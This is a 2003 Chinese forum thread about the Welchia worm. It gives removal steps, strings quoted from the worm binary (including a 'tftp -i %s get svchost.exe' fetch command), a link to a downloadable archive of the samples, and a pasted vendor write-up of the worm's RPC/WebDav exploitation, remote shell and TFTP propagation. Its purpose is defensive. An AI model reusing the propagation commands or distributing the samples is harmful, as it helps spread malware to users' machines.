论坛: 病毒专区 标题: 比冲击波牛狂一万倍的病毒(转帖) 复制本贴地址    
作者: 迷絮 [catmi]    版主   登录
<font color=red>本帖由 [无风之夜] 从 << 菜鸟乐园>> 转移而来</font><p></p>下面是解决方法 !!!!!下面是解决方法!!!
停止这2个系统服务 打开控制面板 然后打开管理工具 打开 服务
看到这2个服务就停止他们
Network connections Sharing
WINS Client
然后到WINS目录里删除这2个文件。。安装防护墙


如果大家在自己 的system32 目录里的WINS目录里发现DLLHOST.EXE 和SVCHOST.EXE那么你肯定中毒了。。请自己在启动里删除。。并且删除这2个文件。。传染比较快。。希望大家安装防护墙,,这是中国人自己编译的病毒

DLLHOST.EXE里面有这样的话! 
=========== I love my wife & baby ~~~ Welcome Chian~~~ Notice: 2004 will remove myself~~ sorry zhongli~~~=========== wins http://download.microsoft.com/download/6/9...980-x86-KOR.exe ; http://download.microsoft.com/download/5/8...980-x86-CHT.exe ; http://download.microsoft.com/download/2/8...980-x86-CHS.exe ; http://download.microsoft.com/download/0/1...980-x86-ENU.exe ; http://download.microsoft.com/download/e/3...980-x86-KOR.exe ; http://download.microsoft.com/download/2/3...980-x86-CHT.exe ; http://download.microsoft.com/download/a/a...980-x86-CHS.exe ; http://download.microsoft.com/download/9/8...980-x86-ENU.exe ; tftp -i %s get svchost.exe wins\SVCHOST.EXE

如果正常,我就不是人了。。哈哈。。。这2个文件在WINS目录里。。
这决对不是玩笑!!!  我是玩HACK的。。这文件我SNIFF过。。反编译过。。。我是黑客圈里叫[D]KING

如果有什么问题,,,你可以说 

说清楚..这2个文件肯定又会给网络安全打一针强心剂!!!! 
如果是XP系统,那么这文件应该是在*:\WINDOWS\SYSTEM32\WINS\里
如果是NT系统..比如2000.那么就应该是在*:\winnt\system32\wins\里
这2个文件大家想研?*梢栽谡饫锵?br /> http://hy88.nease.net/pingvirus.rar

传染是利用TFTP上传的,,如果大家用不上这东东。完全可以删除TFTP.EXE


正常的SVCHOST.EXE是在SYSTEM32目录里...这个2个文件决对不正常,希望大家警惕
如果你的防护墙被PING..那么你那里有一定有机器中了!!

这东西只攻击PING的通的计算机..希望大家安装防护墙!!!设置不允许被PING




!!下面是解决方法 !!!!!下面是解决方法!!!
停止这2个系统服务 打开控制面板 然后打开管理工具 打开 服务
看到这2个服务就停止他们
Network connections Sharing
WINS Client
然后到WINS目录里删除这2个文件。。安装防护墙 



[此贴被 迷絮(catmi) 在 08月22日12时10分 编辑过]

地主 发表时间: 08/21 18:53

回复: view [aney]   论坛用户   登录
看过咯!!~~

B1层 发表时间: 08/21 19:19

回复: miku [miku]   论坛用户   登录
thank you!

B2层 发表时间: 08/21 20:07

回复: lz [lz]   论坛用户   登录
我在我的system32里面发现了!是不是病毒啊?
用瑞星杀不出

B3层 发表时间: 08/21 21:50

回复: tony82yyf [tony82yyf]   论坛用户   登录
用98的该怎样啊
会受攻击吗

B4层 发表时间: 08/21 22:36

回复: yz5263 [yz5263]   论坛用户   登录
真的假的?

B5层 发表时间: 08/22 01:01

回复: 迷絮 [catmi]   版主   登录
我忘了注明 这是转帖~

B6层 发表时间: 08/22 12:41

回复: lflfkm [lflfkm]   论坛用户   登录
为什么我的文件夹里什么都没有呢?空空如也....是零文件耶.WINS这个文件的作用是什么呢?

B7层 发表时间: 08/22 16:48

回复: weidong [weidong]   论坛用户   登录
问题是我现在不能结束这两个进程,总提示源文件正在使用

B8层 发表时间: 09/03 15:28

回复: brid [cdy520]   论坛用户   登录
那在DOS下还是不能吗

B9层 发表时间: 09/05 17:45

回复: weidong [weidong]   论坛用户   登录
dos下倒没试过,因为我没有软驱,优盘又掉了。

B10层 发表时间: 09/05 19:47

回复: TomyChen [quest]   版主   登录
这"黑客"脑子有问题,哈哈

B11层 发表时间: 09/06 08:38

回复: somy [gefujian]   论坛用户   登录
真的是D[KING]写的吗?
好久已经没有碰到他了,这话的口气是有点像!

B12层 发表时间: 09/07 12:44

回复: twtsskuu [twtsskuu]   论坛用户   登录
这句话我看的不大懂能不能说清楚点
我很菜啊!不要介意,帮个忙,因为我家已经中了他
快!
谢谢了

B13层 发表时间: 09/07 18:41

回复: twtsskuu [twtsskuu]   论坛用户   登录
哦1解决了!刚才没看懂,不好意思啊!
多谢帮忙。
还好你发了这个帖,要不然我就KO了

B14层 发表时间: 09/07 18:48

回复: nuclearspy [nuclearspy]   论坛用户   登录
Network connections Sharing
WINS Client

这2个服务在什么情况下有???

这篇文章有问题……

B15层 发表时间: 09/09 22:54

回复: Tim [gdtim991]   论坛用户   登录
幸亏我的没有。。能不能说一下这病毒会有什么样的危害?

B16层 发表时间: 09/10 08:31

回复: 迷絮 [catmi]   版主   登录
这是W32.Welchia.Worm 病毒,具体细节参考如下:

When W32.Welchia.Worm is executed, it performs the following actions:
Copies itself to:
%System%\Wins\Dllhost.exe
NOTE: %System% is a variable. The worm locates the System folder and copies itself to that location. By default, this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).
Makes a copy of %System%\Dllcache\Tftpd.exe as %System%\Wins\svchost.exe.
NOTE: Tftpd is a legitimate program, which is not malicious, and therefore Symantec antivirus products will not detect it.
Adds the subkeys:
RpcPatch
and:
RpcTftpd
to the registry key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
Creates the following services:
Service Name: RpcTftpd
Service Display Name: Network Connections Sharing
Service Binary: %System%\wins\svchost.exe
This service will be set to start manually.
Service Name: RpcPatch
Service Display Name: WINS Client
Service Binary: %System%\wins\dllhost.exe
This service will be set to start automatically.
Ends the process, Msblast, and deletes the %System%\msblast.exe file, which W32.Blaster.Worm drops.
Selects the victim IP address in two different ways: The worm uses either A.B.0.0 from the infected machine's IP of A.B.C.D and counts up, or it will construct a random IP address based on some hard-coded addresses.
After selecting the start address, the worm counts up through a range of Class B-sized networks; for example, if the worm starts at A.B.0.0, it will count up to at least A.B.255.255.
Sends an ICMP echo request, or PING, to check whether the constructed IP address is an active machine on the network.
Once the worm identifies a machine as being active on the network, it will either send data to TCP port 135, which exploits the DCOM RPC vulnerability, or it will send data to TCP port 80 to exploit the WebDav vulnerability.
Creates a remote shell on the vulnerable host that will reconnect to the attacking computer on a random TCP port, between 666 and 765, to receive instructions.
Launches the TFTP server on the attacking machine and instructs the victim machine to connect and download Dllhost.exe and Svchost.exe from the attacking machine. If the file, %System%\dllcache\tftpd.exe exists, the worm may not download svchost.exe.
Checks the computer's operating system version, Service Pack number, and System Locale. It also attempts to connect to Microsoft's Windows Update and download the appropriate DCOM RPC vulnerability patch.
Once the update has been downloaded and executed, the worm will restart the computer so that the patch is installed.
Checks the computer's system date. If the year is 2004, the worm will disable and remove itself.
----------------------------------------------------------------
删除DLLHOST.EXE 和SVCHOST.EXE也没错,只不过前提是你中毒了!!现象:莫名其妙地死机或提示倒计时重新启动计算机;IE浏览器不能正常地打开链接;不能复制粘贴;有时出现应用程序,比如Word异常;系统速度变慢;网络速度下降;系统中有一个名为Dllhost.exe的进程。

B17层 发表时间: 09/10 13:14

回复: dinghj [dinghj]   论坛用户   登录
诺顿有一个专门的工具,用的着这么麻烦!

B18层 发表时间: 09/11 16:48

回复: hatorry [hatorry]   论坛用户   登录
这"黑客"脑子有问题,哈哈 


B19层 发表时间: 09/15 17:05

回复: hacants [hacants]   论坛用户   登录
大家下RISING专杀工具:http://it.rising.com.cn/service/technology/tool.htm

B20层 发表时间: 09/18 21:49

回复: roxbin [roxbin]   论坛用户   登录
不是说这个病毒是个善意病毒吗?

B21层 发表时间: 09/19 22:00

回复: sand133108 [sand133108]   论坛用户   登录
我已经中了.中文名叫冲击波克星.中后会被PING无数次,严重影响网络资源,将防火墙设置为禁止PING.在微软下个补丁.基本上影响不大.

B22层 发表时间: 09/20 21:09

论坛: 病毒专区

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号